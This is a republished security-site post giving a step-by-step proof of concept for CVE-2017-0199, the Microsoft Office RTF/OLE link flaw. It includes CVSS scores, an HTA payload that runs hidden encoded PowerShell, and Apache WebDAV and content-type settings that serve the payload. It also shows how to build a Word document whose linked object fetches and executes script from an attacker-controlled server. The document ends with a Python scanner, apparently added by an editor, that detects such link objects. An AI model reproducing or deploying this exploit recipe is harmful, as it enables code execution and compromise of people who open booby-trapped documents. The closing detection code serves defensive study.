CVE-2017-0199: Microsoft Office RTF vulnerability PoC (vulnerability warning) - 黑吧安全网 (myhack58)

Source: www.myhack58.com (MYHACK58:62201785331)
Author: 佚名 (anonymous)
Published: Apr 17, 2017

CVSS3: 7.8 High
Attack Vector: LOCAL
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: REQUIRED
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS2: 9.3 High
Access Vector: NETWORK
Access Complexity: MEDIUM
Authentication: NONE
Confidentiality Impact: COMPLETE
Integrity Impact: COMPLETE
Availability Impact: COMPLETE
AV:N/AC:M/Au:N/C:C/I:C/A:C

EPSS: 0.974 High
Percentile: 99.9%

0x01 Description
Since FireEye detected and published CVE-2017-0199, I have been researching this vulnerability. Microsoft has officially released the patch, so I decided to release this PoC. The approach I use may differ from the methods other researchers use, and it may be a little easier.
CVE-2017-0199: when a user opens a document that contains the embedded exploit, winword.exe issues an HTTP request to a remote server to retrieve a malicious HTA file. The server returns a fake RTF file with an embedded malicious script; winword.exe looks up the handler for application/hta content through COM objects, which causes the Microsoft HTA application mshta.exe to load and execute the malicious script.
0x02 Technical background
We can include OLEv2 links in an existing document. These objects reflect, inside the document, the current content of the linked source.
Surprisingly, if you try to link an HTA file as an OLEv2 object, it is executed once at creation time, but Winword then returns an error such as:
![](/Article/UploadPic/2017-4/2017417184757772.png?www.myhack58.com)
The problem in this case is that the HTA file is not persisted. If you link to a file and create an icon, persistence may be possible, but we want it hidden and running automatically.
I started by thinking about how to handle a non-malicious OLE object linked to a remote RTF file… To do it the “proper” way Microsoft Office expects, I slightly modified the content type of the documents served by my Apache server and its DAV module… which is covered in the next chapter.
From there, I had a valid embedded object that is linked and updated automatically each time my document is opened!
The next step is to modify the source of the document with my HTA payload!
In this case, I can:
create a dynamic OLEv2 object link to a real RTF file
modify the source of the RTF with my payload
bypass the error that arises when creating a direct link to an HTA document
0x03 Technical details
Step 1
Prepare an HTA file: an HTA file is an HTML application that can run JScript and VBScript.
We create an “ms.hta” file (the HTML wrapper tags were lost in extraction and are restored here; the script body is the author's):

```html
<html>
<head>
<title>Bonjour</title>
<script language="VBScript">
Set owFrClN0giJ = CreateObject("Wscript.Shell")
Set v1ymUkaljYF = CreateObject("Scripting.FileSystemObject")
' The author's check for the PowerShell interpreter relative to the %PSModulePath% directory
If v1ymUkaljYF.FileExists(owFrClN0giJ.ExpandEnvironmentStrings("%PSModulePath%") + "..\powershell.exe") Then
    ' ENCODED_B64_SHELL is the author's placeholder for a base64-encoded PowerShell command
    owFrClN0giJ.Run "powershell.exe -nop -w hidden -e ENCODED_B64_SHELL"
End If
</script>
<hta:application
    id="oHTA"
    applicationname="Bonjour"
    application="yes"
>
</head>
</html>
```

Step 2
Use Winword to create a simple RTF document with any random content. In the example, I use the string My Content.
Name it “ms.rtf”.
Step 3
Upload these 2 files to a web server under our full control. We assume it is stored in /var/www/html.
Now we must configure Apache so that ms.rtf can be used as a link source. Configure Apache:
```sh
a2enmod dav
a2enmod dav_fs
a2enmod dav_lock
a2enmod headers
service apache2 restart
```
The following configuration will:
add “Content-Type: application/rtf” to all files under /ms
allow Microsoft Office to perform PROPFIND (WebDAV) requests
Modify the virtualhost and include:

```apache
# Goes inside the container for /ms in the virtualhost (the enclosing directive was lost in extraction).
# Apache's Header syntax is "Header set <name> <value>"; the stray "to" in the original is dropped.
Header set Content-Type "application/rtf"
Dav On
```

```sh
service apache2 restart
```
Step 4
Using Winword, create a simple RTF document “exploit.rtf”; this will be our exploit!
Insert -> Object
![](/Article/UploadPic/2017-4/2017417184757698.png?www.myhack58.com)
CVE-2017-0199: create an OLEv2 external link
After clicking OK, we get the content of the “ms.rtf” file, which contains only a random string. Save the file as “exploit.rtf”.
![](/Article/UploadPic/2017-4/2017417184757668.png?www.myhack58.com)
CVE-2017-0199: create an OLEv2 link object
At this step we can close Winword and go on to the next step: changing the content of ms.rtf to the HTA payload…
Step 5
The following steps will:
change the content of ms.rtf to the custom HTA payload
make the web server send the “application/hta” content type… this is resolved by the Winword client, which runs mshta.exe to handle this content type and executes our payload

```sh
cat /var/www/html/ms/ms.hta > /var/www/html/ms.rtf
vi /etc/apache2/sites-enabled/000-default
```

Change application/rtf to application/hta, like:

```apache
Header set Content-Type "application/hta"
```

```sh
service apache2 restart
```
Step 6
At this step, if the user opens the “exploit.rtf” file, he has to double-click the linked object to launch the attack…
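As an added defensive example (not code from the original post), the following Python script scans an RTF file for the object shape that the background section and Steps 4 to 6 describe: an OLEv2 link object (\objautlink) whose source is a remote URL and which carries \objupdate, so Word refreshes it when the document is opened. The sample RTF, the TEST-NET-2 host and the OLE2Link stream layout are constructed for illustration.

```python
import re
from typing import Dict, List

# Hex blob that follows \objdata (RTF allows it to be wrapped across lines).
OBJDATA_RE = re.compile(rb"\\objdata\s*([0-9a-fA-F\s]+)")
# Link sources appear as ASCII or UTF-16LE strings inside the decoded OLE stream.
URL_ASCII_RE = re.compile(rb"(?:https?|file)://[\x21-\x7e]+", re.IGNORECASE)
URL_UTF16_RE = re.compile(
    rb"(?:h\x00t\x00t\x00p\x00(?:s\x00)?|f\x00i\x00l\x00e\x00):\x00/\x00/\x00(?:[\x21-\x7e]\x00)+",
    re.IGNORECASE)


def extract_link_urls(objdata_hex: bytes) -> List[str]:
    """Decode one objdata hex blob and return every URL-looking string in it."""
    clean = re.sub(rb"\s+", b"", objdata_hex)
    if len(clean) % 2:  # tolerate a truncated trailing nibble
        clean = clean[:-1]
    raw = bytes.fromhex(clean.decode("ascii"))
    urls = [m.group(0).decode("ascii") for m in URL_ASCII_RE.finditer(raw)]
    urls += [m.group(0).decode("utf-16-le") for m in URL_UTF16_RE.finditer(raw)]
    return urls


def scan_rtf(data: bytes) -> Dict[str, object]:
    """Summarise the link objects in an RTF document and flag the risky combination."""
    urls: List[str] = []
    for m in OBJDATA_RE.finditer(data):
        urls.extend(extract_link_urls(m.group(1)))
    has_objautlink = b"\\objautlink" in data  # object is a link, not an embedded copy
    has_objupdate = b"\\objupdate" in data    # Word refreshes the link when the file opens
    remote = [u for u in urls if not u.lower().startswith("file://")]
    return {
        "objautlink": has_objautlink,
        "objupdate": has_objupdate,
        "urls": urls,
        # A link that fetches from a remote host and refreshes on open is the shape
        # described in the post; the served Content-Type, not the URL extension,
        # decides which handler Word invokes, so ".rtf" in the URL proves nothing.
        "suspicious": has_objautlink and has_objupdate and bool(remote),
    }


# Constructed sample: minimal RTF carrying an OLE link stream with a UTF-16LE URL.
# The host is a TEST-NET-2 address (RFC 5737); nothing is ever fetched.
_URL = "http://198.51.100.7/ms.rtf"
_STREAM = (b"\x01\x05\x00\x00\x02\x00\x00\x00\x08\x00\x00\x00OLE2Link\x00"
           + _URL.encode("utf-16-le") + b"\x00\x00")
SAMPLE_RTF = (b"{\\rtf1\\ansi{\\object\\objautlink\\objupdate{\\*\\objclass Word.Document.8}"
              b"{\\*\\objdata " + _STREAM.hex().encode("ascii") + b"}}}")
```

Running `scan_rtf(SAMPLE_RTF)` reports the URL and sets `suspicious` to True; a plain RTF with no object yields an empty URL list and False.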
